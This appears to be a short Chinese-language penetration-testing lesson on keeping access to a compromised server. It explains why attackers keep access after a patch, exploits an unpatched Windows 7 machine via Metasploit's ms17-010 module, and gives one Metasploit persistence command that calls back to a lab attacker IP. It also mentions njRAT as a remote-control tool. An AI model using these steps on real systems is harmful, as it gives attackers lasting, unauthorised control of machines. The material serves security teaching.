9-1权限维持
1. 权限维持的原因
前提:某目标服务器初始化现阶段存在安全漏洞,可以被利用拿到服务器权限。
一段时间后,系统管理员对系统进行升级,打补丁(patch),系统不存在安全漏洞,导致无法利用漏洞获得服务器权限。
2. 权限维持的使用
技术本身不具备好与坏,只是因为使用者的目的不同,导致结果的好与坏。
恶意人员利用权限维持技术,一直获得服务器的权限。
合法且被授权的渗透测试人员,利用权限维持为了证明服务器存在对应的安全漏洞。
3. 权限维持案例环境介绍
目标机器:win7 没有ms17-010补丁。
利用Metasploit中 ms17-010对应的Exploit可以进行渗透测试,获取”临时”的System权限。(当补丁打上就不同利用ms17-010获取System权限)。
4. 权限维持案例
使用Metasploit run persistence 模块
run persistence -U -i 10 -p 4444 -r 192.168.34.132
9-2权限维持 - 远程控制
1. 远程控制生成与上传
使用njRAT进行演示
2. 重启系统测试
重启机器进行上线测试,以及对对应功能介绍。